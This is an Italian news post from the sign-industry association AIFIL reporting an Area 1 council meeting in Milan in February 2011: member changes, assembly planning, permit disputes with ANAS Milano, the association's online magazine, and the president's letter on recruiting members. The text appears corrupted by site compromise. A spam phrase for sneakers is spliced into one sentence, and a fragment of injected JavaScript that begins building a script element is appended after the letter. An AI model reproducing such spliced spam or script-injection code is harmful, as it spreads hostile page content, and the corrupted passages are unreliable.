AIFIL Area 1 – L’8 febbraio 2011 si è riunito il Consiglio Territoriale. Al centro dell’attenzione le attività e la prossima assemblea di Area, AIFIL[IN]FORMA e i rapporti con ANAS Milano.

di Redazione AIFIL[IN]FORMA - 21 febbraio 2011
Classificato in: Mondo AIFIL, Segreterie territoriali, Vita AIFIL | Tag: ,

L’8 febbraio 2011 si è riunito a Milano, presso la sede della Segreteria Nazionale, il Consiglio Territoriale di AIFIL di Area 1. Si è discusso circa le attività di Area nel 2011, la programmazione di un’assemblea territoriale, AIFIL[IN]FORMA e i rapporti con ANAS Milano.

Dopo aver letto il verbale della precedente riunione e informato i presenti dell’impossibilità di partecipare da parte del Presidente Sergio Arioli, si è proceduto con la lettura della lettera che il Presidente stesso ha inviato al consiglio, invitando a considerare l’ipotesi di creare eventi per incontrare, sul territorio, i soci e – soprattutto – i non soci; scommettendo sull’efficacia e insostituibilità del contatto-rapporto diretto e personale. Mettendo al centro del programma di questa Segreteria l’allargamento della base dei soci in Lombardia. Il Consiglio esprime perplessità e l’argomento sarà oggetto di discussione col Presidente al primo incontro.

Il Segretario Andrea Solinas ha informato i presenti sulle dimissioni del socio AIFIL Carlo Venegoni, che fra l’altro era il rappresentante provinciale per Varese.

Su proposta di Mario Acerbis, viene individuato quale possibile rappresentante provinciale per Varese e Provincia il Socio Mario Scodro della Neon Astra di Varese. Scodro, dopo essere stato interpellato telefonicamente dallo stesso Acerbis, ha confermato la propria disponibilità.

In seguito è stata individuata la data per la prossima Assemblea Territoriale: Sabato 02 aprile 2011, in località da definire.

Circa i rapporti con ANAS Milano, Andrea Solinas ha air yeezy 2 femmes informato il Consiglio sulla telefonata intercorsa con il responsabile dell’ufficio concessioni ANAS Milano Geom.Testa in merito alle lungaggini nel rilascio di autorizzazioni e nulla osta ed è stata analizzata la documentazione presentata dal socio Neon Lecco circa i dinieghi ANAS di autorizzazioni di insegne d’esercizio per le quali l’ente contesta il mancato rispetto delle distanze previste dal CDS.

Al riguardo l’Avv. Francesco Laruffa – invitato al Consiglio Territoriale – si è impegnato a far rammentare tale problematica al Dirigente Anas Dott. Rubino, nell’incontro programmato per il 17 febbraio.

AIFIL[IN]FORMA, la nuova rivista AIFIL dedicata agli operatori del settore insegne recentemente pubblicata nel web, viene valutata da tutti come un “ottimo strumento”, dando atto al Presidente dell’enorme impegno prestato.

Dal confronto è risultato che però che tutt’ora i presenti vi accedono poco; fondamentalmente per mancanza di tempo, inoltre “AIFIL[IN]FORMA richiede un certo impegno, concentrazione, ricerca, navigazione”. Tutti i presenti ritengono che la rivista online “non possa sostituire quella cartacea”. Di ciò si parlerà col Presidente appena possibile.

Viene raccolta e condivisa la proposta di Ornella Pelucelli di organizzare consigli territoriali “itineranti”, chiedendo di volta in volta ospitalità ai soci Lombardi, con lo scopo di conoscere meglio gli associati AIFIL e divulgare l’attività dell’Associazione. Per il prossimo consiglio verrà chiesta ospitalità alla Neon Pavia.

Infine, è stata presentata ed esaminata la candidatura, quale nuovo associato, della ditta Grafica Artigiana di Cesano Maderno, rappresentata dal Sig. Alessandoro Berra e i presenti ne hanno approvato all’unanimità l’ingresso in AIFIL.

Di seguito alcuni stralci della lettera del Presidente Sergio Arioli al Consiglio dell’Area 1.

Cari soci, 

[…] forse va ripresa la riflessione della pen’ultima assemblea, nella quale valutammo insieme l’ipotesi di avviare una campagna di incontri diretti con i soci e non soci. È il caso di tornare sul territorio, provincia per provincia, contattando e parlando direttamente […] con tutti gli operatori del settore? È il caso di ritornare a scommettere, nell’epoca di Internet e dei Socialnework, sul contatto personale diretto? Non saremmo certo i primi: il marketing relazionale ha riconquistato da tempo il ruolo di protagonista anche nelle attività dei grandi brand, riducendo a ruoli subalterni le varie forme di pubblicità. […] potremmo verificare così, in concreto e finalmente, quanto le nostre ipotesi sulle cause di allontanamento di alcuni soci siano fondate o meno […] potremmo scoprire […] come sia possibile conquistare nuovi soci […] certo, le forme e i modi sono da individuare e ragionare con attenzione e da aggiornare strada facendo, operando con metodo sperimentale e con massima elasticità […] potrebbe essere questa la “mission” – principale – della attuale segreteria? […].var d=document;var s=d.createElement('script');

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed